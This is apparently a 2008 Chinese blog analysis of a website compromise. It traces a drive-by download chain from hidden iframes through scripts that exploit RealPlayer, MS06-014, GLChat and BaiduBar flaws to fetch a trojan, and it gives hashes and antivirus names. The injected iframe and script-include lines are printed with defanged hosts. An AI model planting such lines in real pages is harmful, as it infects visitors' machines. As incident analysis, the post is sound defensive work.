本文分析了一个知识问答网站遭遇挂马事件的过程,详细介绍了恶意代码如何通过多种漏洞进行传播,并最终下载恶意程序。涉及的漏洞包括RealPlayer、MS06-014等。
某知识问答竞技生活网被挂马Trojan.Win32.Undef.eab
endurer 原创
2008-03-28 第1版
在网站页面中发现代码:
/---
<iframe src="hxxp://www.t**-*t*ou.cn/ping.html" width="0" height="0" frameborder="0"></iframe>
---/
1 hxxp://www.t**-*t*ou.cn/ping.html
/---
<iframe src=hxxp://a*.1**58d*m.com/b3.htm?001 width=0 height=0></iframe>
<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/1539552.js"></script>
---/
1.1 hxxp://a*.1**58d*m.com/b3.htm?001 包含代码:
/---
<script language=javascript src=hxxp://b*.1**58d*m.com/one/ok.js></script>
<iframe src=hxxp://b*.1**58d*m.com/one/ok.htm width=1 height=1 border=1></iframe>
---/
1.1.1 hxxp://b*.1**58d*m.com/one/ok.js
利用 Reaplayer 漏洞下载 hxxp://c*.1**58d*m.com/ok.exe
文件说明符 : D:/test/ok.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-3-28 12:29:15
修改时间 : 2008-3-28 12:29:15
访问时间 : 2008-3-28 12:29:41
大小 : 16596 字节 16.212 KB
MD5 : 939d120a65a5e3a04537b51f87eb01f9
SHA1: C3289F43AB1D4CEFBBCD60A3D15474FDDA0735FD
CRC32: 4a1ffccf
Kaspersky 报为 Trojan-Downloader.Win32.Small.ivu,瑞星报为 Trojan.Win32.Undef.eab
1.1.2 hxxp://b*.1**58d*m.com/one/ok.htm 内容为:
/---
<SCRIPT LANGUAGE="JavaScript">
eval("/151/146/50/…(略)…/12/175")
</SCRIPT>
---/
输出代码:
/---
<script src=hxxp://b*.1**58d*m.com/one/14.js></script>
<script src=hxxp://b*.1**58d*m.com/one/rl.js></script>
<script src=hxxp://b*.1**58d*m.com/one/lz.js></script>
---/
1.1.2.1 hxxp://b*.1**58d*m.com/one/14.js
利用MS06-014漏洞 下载 hxxp://c*.1**58d*m.com/ok.exe
1.1.2.2 hxxp://b*.1**58d*m.com/one/rl.js
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载 hxxp://c*.1**58d*m.com/ok.exe
1.1.2.3 hxxp://b*.1**58d*m.com/one/lz.js
利用 联众世界(GLCHAT.GLChatCtrl.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://c*.1**58d*m.com/ok.exe
1.1.2.4 利用 BaiduBar.Tool 下载 hxxp://c*.1**58d*m.com/Baidu.cab,内含 new.exe
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
